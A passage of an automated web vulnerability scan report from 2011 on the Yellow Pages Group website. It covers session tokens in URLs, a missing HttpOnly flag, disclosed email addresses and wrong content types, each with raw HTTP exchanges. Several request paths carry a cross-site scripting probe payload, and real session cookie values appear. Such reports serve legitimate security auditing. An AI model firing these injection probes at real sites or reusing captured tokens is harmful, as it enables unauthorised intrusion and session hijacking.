<li class="child"><a href="http://www.lespac.com/placez_une_annonce.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Place an ad on LesPAC.com">Place an ad on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/aide_iphone.php?PHPSESSID=10d0e9f09c7487a57daa2b917a5e3bce" target="_blank" title="LesPAC.com Mobile">LesPAC.com Mobile</a>
...[SNIP]...

2.2. http://www.ypg.com/en/contact-us  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/contact-us HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:22:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/media.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Advertise on LesPAC.com">Advertise on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/placez_une_annonce.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Place an ad on LesPAC.com">Place an ad on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/aide_iphone.php?PHPSESSID=10d0e9f09c7487a57daa2b917a5e3bce" target="_blank" title="LesPAC.com Mobile">LesPAC.com Mobile</a>
...[SNIP]...

2.3. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:26:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/media.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Advertise on LesPAC.com">Advertise on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/placez_une_annonce.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Place an ad on LesPAC.com">Place an ad on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/aide_iphone.php?PHPSESSID=10d0e9f09c7487a57daa2b917a5e3bce" target="_blank" title="LesPAC.com Mobile">LesPAC.com Mobile</a>
...[SNIP]...

2.4. http://www.ypg.com/en/images/loading.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/images/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:21:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/media.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Advertise on LesPAC.com">Advertise on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/placez_une_annonce.php?PHPSESSID=35235eca42b0d629d0c84c322586ee78" target="_blank" title="Place an ad on LesPAC.com">Place an ad on LesPAC.com</a>
...[SNIP]...
<li class="child"><a href="http://www.lespac.com/aide_iphone.php?PHPSESSID=10d0e9f09c7487a57daa2b917a5e3bce" target="_blank" title="LesPAC.com Mobile">LesPAC.com Mobile</a>
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /en/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /en/ HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:21:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=ljn6ngfllljc19g9hp7vtra985; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...

4. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. http://www.ypg.com/en/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/contact-us HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:22:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...
<a href="mailto:custserv-ont@ypg.com">
...[SNIP]...
<a href="mailto:custserv-que@ypg.com">
...[SNIP]...
<a href="mailto:call.centre@ypg.com">
...[SNIP]...

4.2. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The following email address was disclosed in the response:

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:26:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<a href="mailto:IR.info@ypg.com">IR.info@ypg.com</a>
...[SNIP]...

4.3. http://www.ypg.com/en/images/loading.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/images/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:21:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<a href="mailto:IR.info@ypg.com">IR.info@ypg.com</a>
...[SNIP]...

4.4. http://www.ypg.com/js/jquery/plugins/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:21:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 11 Apr 2011 14:27:47 GMT
ETag: "58dfe-1173-61297ec0"
Accept-Ranges: bytes
Content-Length: 4467
Connection: close
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

5. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://www.ypg.com/images/imageresizer.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /images/imageresizer.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/imageresizer.php?src=_var_data_featured_images_featuredb475dbe.png&w=980&h=298 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:21:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Last-Modified: Mon, 18 Apr 2011 16:21 GMT
Expires:
ETag: "76584862-1303158074-191060"
Cache-Control: must-revalidate, proxy-revalidate, max-age=259200, s-maxage=259200
Content-Length: 191060
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR.......*.....{..... .IDATx...[..8.%.P..v..f...e.&.gvP.v.<.A<.H.....S=c.3.B"A....B...%..*"..'......'.b5.':..].[{gn....P..^;.>~..=...=.O.S..4...m...T5....W;W.X.K.C.k.........T[.y.....(pP
...[SNIP]...

5.2. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ypg.com
Path:   /modules/core/front/images/ypg_16x16.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /modules/core/front/images/ypg_16x16.ico HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:22:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 11 Apr 2011 14:30:57 GMT
ETag: "594c3-47e-6c7caa40"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@...................................................d..[Z...X..}.../...........................................!i..."...........Q.............................
...[SNIP]...

Report generated by XSS.CX at Mon Apr 18 16:42:14 CDT 2011.